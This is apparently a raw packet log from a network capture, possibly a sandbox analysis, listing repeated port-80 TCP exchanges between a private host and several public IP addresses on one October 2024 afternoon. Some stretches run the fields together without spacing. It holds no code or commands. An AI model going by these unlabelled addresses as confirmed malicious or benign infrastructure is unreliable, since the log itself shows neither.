                                                                                                                          Oct 21, 2024 17:25:46.524936914 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:46.525023937 CEST5000380192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:46.538314104 CEST5000380192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:46.543903112 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:46.543962002 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065124035 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065136909 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065200090 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065234900 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065289974 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065311909 CEST5000380192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:47.065311909 CEST5000380192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:47.065325975 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065365076 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.065371990 CEST5000380192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:47.067542076 CEST8050003188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:47.067612886 CEST5000380192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:48.046921968 CEST5000380192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:49.065587997 CEST5000480192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:49.071357965 CEST8050004188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:49.071450949 CEST5000480192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:49.077462912 CEST5000480192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:49.082925081 CEST8050004188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:49.589481115 CEST8050004188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:49.591342926 CEST8050004188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:49.591454983 CEST5000480192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:49.592391014 CEST5000480192.168.2.6188.114.96.3
                                                                                                                          Oct 21, 2024 17:25:49.597805977 CEST8050004188.114.96.3192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:54.620625019 CEST5000580192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:54.626147985 CEST80500053.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:54.627228022 CEST5000580192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:54.643352985 CEST5000580192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:54.650038958 CEST80500053.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:55.057995081 CEST80500053.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:55.058197021 CEST5000580192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:56.156872988 CEST5000580192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:56.162446022 CEST80500053.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:57.182322979 CEST5000880192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:57.188049078 CEST80500083.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:57.191109896 CEST5000880192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:57.201503038 CEST5000880192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:57.207029104 CEST80500083.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:57.616095066 CEST80500083.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:57.616174936 CEST5000880192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:58.703278065 CEST5000880192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:58.709234953 CEST80500083.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:59.733566999 CEST5000980192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:59.891983032 CEST80500093.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:59.892069101 CEST5000980192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:59.910567999 CEST5000980192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:25:59.916326046 CEST80500093.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:25:59.916363955 CEST80500093.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:01.272411108 CEST80500093.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:01.277396917 CEST5000980192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:26:01.423147917 CEST5000980192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:26:01.429265976 CEST80500093.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:02.440749884 CEST5001080192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:26:02.446053028 CEST80500103.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:02.446126938 CEST5001080192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:26:02.454828024 CEST5001080192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:26:02.460712910 CEST80500103.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:04.854501963 CEST80500103.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:04.855038881 CEST80500103.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:04.855339050 CEST5001080192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:26:04.870131016 CEST5001080192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:26:04.875682116 CEST80500103.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:10.608156919 CEST5732780192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:10.613770962 CEST8057327217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:10.613846064 CEST5732780192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:10.623488903 CEST5732780192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:10.629015923 CEST8057327217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:11.174297094 CEST8057327217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:11.219341040 CEST5732780192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:11.245690107 CEST8057327217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:11.247612000 CEST5732780192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:12.125025988 CEST5732780192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:13.144195080 CEST5732880192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:13.149746895 CEST8057328217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:13.151053905 CEST5732880192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:13.163052082 CEST5732880192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:13.168482065 CEST8057328217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:13.709779024 CEST8057328217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:13.751070023 CEST5732880192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:13.782599926 CEST8057328217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:13.782686949 CEST5732880192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:14.671957016 CEST5732880192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:15.690181017 CEST5732980192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:15.695856094 CEST8057329217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:15.695997953 CEST5732980192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:15.710289955 CEST5732980192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:15.715869904 CEST8057329217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:15.715960979 CEST8057329217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:16.281411886 CEST8057329217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:16.328130960 CEST5732980192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:16.328612089 CEST8057329217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:16.328680992 CEST5732980192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:17.218885899 CEST5732980192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:18.237478018 CEST5733080192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:18.243100882 CEST8057330217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:18.243304968 CEST5733080192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:18.250752926 CEST5733080192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:18.256267071 CEST8057330217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:18.810642004 CEST8057330217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:18.810723066 CEST8057330217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:18.811053991 CEST5733080192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:18.883183956 CEST8057330217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:18.886605024 CEST5733080192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:18.891979933 CEST5733080192.168.2.6217.70.184.50
                                                                                                                          Oct 21, 2024 17:26:18.897418976 CEST8057330217.70.184.50192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:23.962228060 CEST5733380192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:26:23.967864037 CEST805733394.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:23.967948914 CEST5733380192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:26:23.979671001 CEST5733380192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:26:23.985119104 CEST805733394.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:24.623505116 CEST805733394.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:24.623719931 CEST5733380192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:26:25.484532118 CEST5733380192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:26:25.490058899 CEST805733394.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:26.503072023 CEST5733480192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:26:26.509176970 CEST805733494.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:26.509315968 CEST5733480192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:26:26.518501043 CEST5733480192.168.2.694.23.162.163
                                                                                                                          Oct 21, 2024 17:26:26.524272919 CEST805733494.23.162.163192.168.2.6
                                                                                                                          Oct 21, 2024 17:26:27.160948038 CEST805733494.23.162.163192.168.2.6
Oct 21, 2024 17:26:27.162255049 CEST  57334  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:28.031348944 CEST  57334  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:28.036920071 CEST  80     57334  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:29.049935102 CEST  57335  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:29.055691004 CEST  80     57335  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:29.055860043 CEST  57335  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:29.065884113 CEST  57335  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:29.071849108 CEST  80     57335  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:29.072523117 CEST  80     57335  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:29.632683039 CEST  80     57335  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:29.632874966 CEST  57335  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:30.578713894 CEST  57335  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:30.584851980 CEST  80     57335  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:31.598663092 CEST  57336  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:31.604269028 CEST  80     57336  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:31.604337931 CEST  57336  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:31.618628025 CEST  57336  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:31.624347925 CEST  80     57336  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:32.176753044 CEST  80     57336  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:32.176819086 CEST  80     57336  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:32.176856995 CEST  80     57336  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:32.177099943 CEST  57336  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:32.177584887 CEST  80     57336  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:32.177620888 CEST  80     57336  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:32.177777052 CEST  57336  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:32.178761005 CEST  80     57336  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:32.178801060 CEST  80     57336  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:32.178834915 CEST  57336  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:32.234412909 CEST  57336  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:32.278827906 CEST  80     57336  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:32.281303883 CEST  57336  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:32.285058975 CEST  57336  80     192.168.2.6      94.23.162.163
Oct 21, 2024 17:26:32.291080952 CEST  80     57336  94.23.162.163    192.168.2.6
Oct 21, 2024 17:26:38.145716906 CEST  57337  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:38.151370049 CEST  80     57337  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:38.151456118 CEST  57337  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:38.162096977 CEST  57337  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:38.168529034 CEST  80     57337  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:38.702219009 CEST  80     57337  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:38.750092983 CEST  57337  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:38.766196012 CEST  80     57337  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:38.766354084 CEST  57337  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:39.671967983 CEST  57337  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:40.690748930 CEST  57338  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:40.696979046 CEST  80     57338  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:40.697084904 CEST  57338  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:40.708942890 CEST  57338  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:40.714602947 CEST  80     57338  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:41.252935886 CEST  80     57338  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:41.296891928 CEST  57338  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:41.316837072 CEST  80     57338  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:41.316929102 CEST  57338  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:42.223077059 CEST  57338  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:43.237818003 CEST  57339  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:43.243470907 CEST  80     57339  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:43.243550062 CEST  57339  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:43.255112886 CEST  57339  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:43.260469913 CEST  80     57339  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:43.261152029 CEST  80     57339  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:43.792601109 CEST  80     57339  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:43.843745947 CEST  57339  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:43.855992079 CEST  80     57339  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:43.856048107 CEST  57339  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:44.765990973 CEST  57339  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:45.784938097 CEST  57340  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:45.790371895 CEST  80     57340  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:45.790436983 CEST  57340  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:45.797872066 CEST  57340  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:45.804137945 CEST  80     57340  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:46.344805956 CEST  80     57340  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:46.344855070 CEST  80     57340  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:46.344976902 CEST  57340  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:46.408199072 CEST  80     57340  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:46.408324957 CEST  57340  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:46.410078049 CEST  57340  80     192.168.2.6      103.224.182.242
Oct 21, 2024 17:26:46.415546894 CEST  80     57340  103.224.182.242  192.168.2.6
Oct 21, 2024 17:26:51.454016924 CEST  57341  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:51.462378979 CEST  80     57341  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:51.462450981 CEST  57341  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:51.472347975 CEST  57341  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:51.479010105 CEST  80     57341  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:52.019298077 CEST  80     57341  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:52.063050985 CEST  57341  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:52.087869883 CEST  80     57341  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:52.087938070 CEST  57341  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:52.987077951 CEST  57341  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:54.002522945 CEST  57342  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:54.008039951 CEST  80     57342  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:54.008106947 CEST  57342  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:54.017167091 CEST  57342  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:54.022932053 CEST  80     57342  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:54.578855038 CEST  80     57342  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:54.627111912 CEST  57342  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:54.647006035 CEST  80     57342  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:54.647135019 CEST  57342  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:55.531408072 CEST  57342  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:56.549777985 CEST  57343  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:56.555181980 CEST  80     57343  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:56.559212923 CEST  57343  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:56.571077108 CEST  57343  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:56.576695919 CEST  80     57343  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:56.576708078 CEST  80     57343  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:57.162192106 CEST  80     57343  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:57.203134060 CEST  57343  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:57.276360989 CEST  80     57343  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:57.276417971 CEST  57343  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:58.078296900 CEST  57343  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:59.096980095 CEST  57344  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:59.103972912 CEST  80     57344  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:59.104075909 CEST  57344  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:59.111083031 CEST  57344  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:59.116549969 CEST  80     57344  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:59.678983927 CEST  80     57344  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:59.734375000 CEST  57344  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:59.747440100 CEST  80     57344  209.74.64.187    192.168.2.6
Oct 21, 2024 17:26:59.747531891 CEST  57344  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:59.748384953 CEST  57344  80     192.168.2.6      209.74.64.187
Oct 21, 2024 17:26:59.753940105 CEST  80     57344  209.74.64.187    192.168.2.6
Oct 21, 2024 17:27:04.974661112 CEST  57347  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:04.981715918 CEST  80     57347  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:04.982259989 CEST  57347  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:04.992007971 CEST  57347  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:04.997564077 CEST  80     57347  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:05.599025965 CEST  80     57347  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:05.640619993 CEST  57347  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:05.698987007 CEST  80     57347  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:05.699043036 CEST  57347  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:06.501660109 CEST  57347  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:07.518685102 CEST  57348  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:07.525450945 CEST  80     57348  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:07.525526047 CEST  57348  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:07.541938066 CEST  57348  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:07.547960997 CEST  80     57348  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:08.139972925 CEST  80     57348  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:08.187588930 CEST  57348  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:08.239902020 CEST  80     57348  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:08.240011930 CEST  57348  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:09.049633026 CEST  57348  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:10.069437981 CEST  57349  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:10.075006962 CEST  80     57349  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:10.075093985 CEST  57349  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:10.086639881 CEST  57349  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:10.091944933 CEST  80     57349  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:10.092065096 CEST  80     57349  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:10.688008070 CEST  80     57349  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:10.688023090 CEST  80     57349  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:10.688113928 CEST  57349  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:11.593787909 CEST  57349  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:12.612087965 CEST  57350  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:12.619770050 CEST  80     57350  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:12.619910955 CEST  57350  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:12.627065897 CEST  57350  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:12.633837938 CEST  80     57350  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:13.233931065 CEST  80     57350  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:13.281250000 CEST  57350  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:13.333620071 CEST  80     57350  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:13.333734035 CEST  57350  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:13.334582090 CEST  57350  80     192.168.2.6      65.21.196.90
Oct 21, 2024 17:27:13.340029955 CEST  80     57350  65.21.196.90     192.168.2.6
Oct 21, 2024 17:27:18.530016899 CEST  57351  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:18.535449028 CEST  80     57351  3.33.130.190     192.168.2.6
Oct 21, 2024 17:27:18.535732031 CEST  57351  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:18.544778109 CEST  57351  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:18.550297022 CEST  80     57351  3.33.130.190     192.168.2.6
Oct 21, 2024 17:27:19.884737968 CEST  80     57351  3.33.130.190     192.168.2.6
Oct 21, 2024 17:27:19.884813070 CEST  57351  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:20.046936035 CEST  57351  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:20.052577972 CEST  80     57351  3.33.130.190     192.168.2.6
Oct 21, 2024 17:27:21.066206932 CEST  57352  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:21.074048996 CEST  80     57352  3.33.130.190     192.168.2.6
Oct 21, 2024 17:27:21.074148893 CEST  57352  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:21.084517002 CEST  57352  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:21.091995001 CEST  80     57352  3.33.130.190     192.168.2.6
Oct 21, 2024 17:27:21.496413946 CEST  80     57352  3.33.130.190     192.168.2.6
Oct 21, 2024 17:27:21.496501923 CEST  57352  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:22.594255924 CEST  57352  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:22.600024939 CEST  80     57352  3.33.130.190     192.168.2.6
Oct 21, 2024 17:27:23.618436098 CEST  57353  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:23.624134064 CEST  80     57353  3.33.130.190     192.168.2.6
Oct 21, 2024 17:27:23.624234915 CEST  57353  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:23.641599894 CEST  57353  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:23.647031069 CEST  80     57353  3.33.130.190     192.168.2.6
Oct 21, 2024 17:27:23.647219896 CEST  80     57353  3.33.130.190     192.168.2.6
Oct 21, 2024 17:27:24.048705101 CEST  80     57353  3.33.130.190     192.168.2.6
Oct 21, 2024 17:27:24.048799992 CEST  57353  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:25.156407118 CEST  57353  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:25.162174940 CEST  80     57353  3.33.130.190     192.168.2.6
Oct 21, 2024 17:27:26.174984932 CEST  57354  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:26.184015989 CEST  80     57354  3.33.130.190     192.168.2.6
Oct 21, 2024 17:27:26.184113979 CEST  57354  80     192.168.2.6      3.33.130.190
Oct 21, 2024 17:27:26.191431999 CEST  57354  80     192.168.2.6      3.33.130.190
                                                                                                                          Oct 21, 2024 17:27:26.201715946 CEST80573543.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:26.618349075 CEST80573543.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:26.618472099 CEST80573543.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:26.618719101 CEST5735480192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:26.620899916 CEST5735480192.168.2.63.33.130.190
                                                                                                                          Oct 21, 2024 17:27:26.626349926 CEST80573543.33.130.190192.168.2.6
                                                                                                                          Oct 21, 2024 17:27:31.665642023 CEST5735580192.168.2.63.33.130.190
